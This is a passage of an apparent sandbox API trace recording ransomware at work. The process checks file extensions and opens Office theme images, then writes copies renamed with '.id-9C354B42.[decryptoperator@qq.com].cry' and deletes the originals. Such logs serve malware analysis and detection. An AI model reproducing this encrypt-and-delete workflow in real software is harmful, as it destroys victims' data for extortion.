(lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.769] lstrlenW (lpString=".zip") returned 4 [0047.769] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.769] lstrlenW (lpString=".rar") returned 4 [0047.769] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.769] lstrlenW (lpString=".bz2") returned 4 [0047.769] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.769] lstrlenW (lpString=".7z") returned 3 [0047.769] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.770] lstrlenW (lpString=".dbf") returned 4 [0047.770] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.770] lstrlenW (lpString=".1cd") returned 4 [0047.770] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.770] lstrlenW (lpString=".jpg") returned 4 [0047.770] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.770] lstrlenW (lpString=".doc") returned 4 [0047.770] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.770] lstrlenW (lpString=".docx") returned 5 [0047.770] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.770] lstrlenW (lpString=".pdf") returned 4 [0047.770] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.770] lstrlenW (lpString=".xls") returned 4 [0047.770] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.770] lstrlenW (lpString=".xlsx") returned 5 [0047.770] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.770] lstrlenW (lpString=".ppt") returned 4 [0047.770] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.770] lstrlenW (lpString=".zip") returned 4 [0047.770] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.770] lstrlenW (lpString=".rar") returned 4 [0047.770] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.770] lstrlenW (lpString=".bz2") returned 4 [0047.770] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.770] lstrlenW (lpString=".7z") returned 3 [0047.770] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.770] lstrlenW (lpString=".dbf") returned 4 [0047.770] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.770] lstrlenW (lpString=".1cd") returned 4 [0047.770] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.770] lstrlenW (lpString=".jpg") returned 4 [0047.771] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.771] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0047.771] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0047.771] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=937) returned 1 [0047.771] CloseHandle (hObject=0x1fc) returned 1 [0047.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 0x20 [0047.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0047.771] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.771] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.155] GetLastError () returned 0x0 [0048.155] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x3a9, lpOverlapped=0x0) returned 1 [0048.260] WriteFile (in: hFile=0x200, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x3b0, lpOverlapped=0x0) returned 1 [0048.261] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.261] WriteFile (in: hFile=0x200, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.261] SetEndOfFile (hFile=0x200) returned 1 [0048.261] CloseHandle (hObject=0x200) returned 1 [0048.261] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.261] SetEndOfFile (hFile=0x1fc) returned 1 [0048.262] CloseHandle (hObject=0x1fc) returned 1 [0048.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.262] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 1 [0048.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.263] lstrlenW (lpString=".doc") returned 4 [0048.263] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.263] lstrlenW (lpString=".docx") returned 5 [0048.263] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.263] lstrlenW (lpString=".pdf") returned 4 [0048.263] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.263] lstrlenW (lpString=".xls") returned 4 [0048.263] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.263] lstrlenW (lpString=".xlsx") returned 5 [0048.263] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.263] lstrlenW (lpString=".ppt") returned 4 [0048.263] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.263] lstrlenW (lpString=".zip") returned 4 [0048.263] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.263] lstrlenW (lpString=".rar") returned 4 [0048.263] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.263] lstrlenW (lpString=".bz2") returned 4 [0048.263] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.263] lstrlenW (lpString=".7z") returned 3 [0048.263] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.263] lstrlenW (lpString=".dbf") returned 4 [0048.263] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.263] lstrlenW (lpString=".1cd") returned 4 [0048.263] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.263] lstrlenW (lpString=".jpg") returned 4 [0048.263] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.263] lstrlenW (lpString=".doc") returned 4 [0048.264] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.264] lstrlenW (lpString=".docx") returned 5 [0048.264] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.264] lstrlenW (lpString=".pdf") returned 4 [0048.264] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.264] lstrlenW (lpString=".xls") returned 4 [0048.264] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.264] lstrlenW (lpString=".xlsx") returned 5 [0048.264] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.264] lstrlenW (lpString=".ppt") returned 4 [0048.264] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.264] lstrlenW (lpString=".zip") returned 4 [0048.264] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.264] lstrlenW (lpString=".rar") returned 4 [0048.264] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.264] lstrlenW (lpString=".bz2") returned 4 [0048.264] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.264] lstrlenW (lpString=".7z") returned 3 [0048.264] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.264] lstrlenW (lpString=".dbf") returned 4 [0048.264] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.264] lstrlenW (lpString=".1cd") returned 4 [0048.264] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0048.264] lstrlenW (lpString=".jpg") returned 4 [0048.264] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.265] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0048.265] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0048.323] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=33479) returned 1 [0048.323] CloseHandle (hObject=0x1fc) returned 1 [0048.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 0x20 [0048.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0048.323] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.323] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0048.492] GetLastError () returned 0x0 [0048.492] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x82c7, lpOverlapped=0x0) returned 1 [0048.727] WriteFile (in: hFile=0x224, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x82d0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x82d0, lpOverlapped=0x0) returned 1 [0048.729] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.729] WriteFile (in: hFile=0x224, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.729] SetEndOfFile (hFile=0x224) returned 1 [0048.729] CloseHandle (hObject=0x224) returned 1 [0048.729] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.729] SetEndOfFile (hFile=0x1fc) returned 1 [0048.730] CloseHandle (hObject=0x1fc) returned 1 [0048.730] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.730] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 1 [0048.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.731] lstrlenW (lpString=".doc") returned 4 [0048.731] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.731] lstrlenW (lpString=".docx") returned 5 [0048.731] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.731] lstrlenW (lpString=".pdf") returned 4 [0048.731] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.731] lstrlenW (lpString=".xls") returned 4 [0048.731] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.731] lstrlenW (lpString=".xlsx") returned 5 [0048.731] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.731] lstrlenW (lpString=".ppt") returned 4 [0048.731] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.731] lstrlenW (lpString=".zip") returned 4 [0048.731] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.731] lstrlenW (lpString=".rar") returned 4 [0048.731] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.731] lstrlenW (lpString=".bz2") returned 4 [0048.731] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.731] lstrlenW (lpString=".7z") returned 3 [0048.731] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.731] lstrlenW (lpString=".dbf") returned 4 [0048.731] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.731] lstrlenW (lpString=".1cd") returned 4 [0048.731] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.731] lstrlenW (lpString=".jpg") returned 4 [0048.731] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.731] lstrlenW (lpString=".doc") returned 4 [0048.731] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.731] lstrlenW (lpString=".docx") returned 5 [0048.731] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.731] lstrlenW (lpString=".pdf") returned 4 [0048.732] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.732] lstrlenW (lpString=".xls") returned 4 [0048.732] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.732] lstrlenW (lpString=".xlsx") returned 5 [0048.732] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.732] lstrlenW (lpString=".ppt") returned 4 [0048.732] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.732] lstrlenW (lpString=".zip") returned 4 [0048.732] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.732] lstrlenW (lpString=".rar") returned 4 [0048.732] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.732] lstrlenW (lpString=".bz2") returned 4 [0048.732] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.732] lstrlenW (lpString=".7z") returned 3 [0048.732] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.732] lstrlenW (lpString=".dbf") returned 4 [0048.732] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.732] lstrlenW (lpString=".1cd") returned 4 [0048.732] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.732] lstrlenW (lpString=".jpg") returned 4 [0048.732] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.732] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0048.732] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0049.032] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=42453) returned 1 [0049.032] CloseHandle (hObject=0x1ac) returned 1 [0049.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 0x20 [0049.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0049.033] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.033] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.033] GetLastError () returned 0x0 [0049.033] ReadFile (in: hFile=0x1ac, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0xa5d5, lpOverlapped=0x0) returned 1 [0049.360] WriteFile (in: hFile=0x200, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xa5e0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xa5e0, lpOverlapped=0x0) returned 1 [0049.361] ReadFile (in: hFile=0x1ac, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.361] WriteFile (in: hFile=0x200, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.362] SetEndOfFile (hFile=0x200) returned 1 [0049.362] CloseHandle (hObject=0x200) returned 1 [0049.362] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.362] SetEndOfFile (hFile=0x1ac) returned 1 [0049.363] CloseHandle (hObject=0x1ac) returned 1 [0049.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0049.363] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 1 [0049.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0049.363] lstrlenW (lpString=".doc") returned 4 [0049.363] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.363] lstrlenW (lpString=".docx") returned 5 [0049.363] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.363] lstrlenW (lpString=".pdf") returned 4 [0049.363] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.363] lstrlenW (lpString=".xls") returned 4 [0049.363] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.363] lstrlenW (lpString=".xlsx") returned 5 [0049.363] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.363] lstrlenW (lpString=".ppt") returned 4 [0049.363] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.363] lstrlenW 